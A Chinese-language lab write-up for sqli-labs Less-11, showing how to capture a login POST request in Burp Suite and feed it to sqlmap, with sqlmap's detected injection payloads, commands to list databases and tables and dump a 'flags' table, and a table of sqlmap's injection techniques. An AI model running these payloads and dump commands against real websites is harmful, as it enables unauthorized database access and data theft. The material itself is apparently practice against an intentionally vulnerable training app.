sql-labs\less-11 burpsuite+sqlmap

📅 2026/7/7 4:16:22
sql-labs\less-11 burpsuite+sqlmap
proxy -- http history -- raw -- ouput -- raw1.txtsqlmap -- cmd1.确定注入点python sqlmap.py -r raw1.txt -p uname --level3 --risk2 --batch返回--- Parameter: uname (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: unameadmin% OR NOT 61916191#passwd123456submitSubmit Type: error-based Title: MySQL 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: unameadmin% AND EXTRACTVALUE(7852,CONCAT(0x5c,0x717a786a71,(SELECT (ELT(78527852,1))),0x7176627671)) AND pmkP%pmkPpasswd123456submitSubmit Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: unameadmin% AND (SELECT 8744 FROM (SELECT(SLEEP(5)))MvXp) AND dBhk%dBhkpasswd123456submitSubmit Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: unameadmin% UNION ALL SELECT CONCAT(0x717a786a71,0x684a5778596e75474b4b636b626a69525256716d6e5461527870796e4d4b44537668695257524361,0x7176627671),NULL-- -passwd123456submitSubmit --- [16:52:13] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL 5.1 [16:52:16] [INFO] fetched data logged to text files under C:\Users\dcy10\AppData\Local\sqlmap\output\100.71.228.61 [*] ending 16:52:16 /2026-07-06/已知有四种type既然已经确认了注入点直接用 sqlmap 拉数据# 列举所有数据库python sqlmap.py -r raw1.txt -p uname --dbs --batch# 假设看到数据库名为 ctf_db列举其表python sqlmap.py -r raw1.txt -p uname -D ctf_db --tables --batch# 看到表 flagsdump 全部数据python sqlmap.py -r raw1.txt -p uname -D ctf_db -T flags --dump --batch如果只想用某种特定注入技术比如报错注入更快● 指定注入技术 python sqlmap.py -r raw1.txt -p uname --techniqueE --dump --batch ● 设置时间盲注延迟时间 python sqlmap.py -r raw1.txt -p uname --techniqueT --time-sec2 --dump --batch ● 设置联合查询 python sqlmap.py -r raw1.txt -p uname --techniqueU --union-cols2 --dump --batch字母技术名称原理简述特点B​Boolean-based blind基于布尔盲注通过页面返回的真/假差异推断数据稳定但需要大量请求E​Error-based基于报错注入利用数据库报错信息带出数据速度快一次请求即可获得多位数据U​Union query基于联合查询注入通过 UNION SELECT 将数据直接回显到页面最快但依赖页面有回显位置S​Stacked queries基于堆叠查询注入执行多条 SQL 语句如 INSERT/UPDATE/DELETE功能强但部分数据库/环境不支持T​Time-based blind基于时间盲注通过数据库延时响应来判断条件真假最慢仅当其他技术均不可用时使用Q​Inline queries基于内联查询注入将子查询嵌入到原始查询中如SELECT * FROM users WHERE id(SELECT ...)较少见适用于特定场景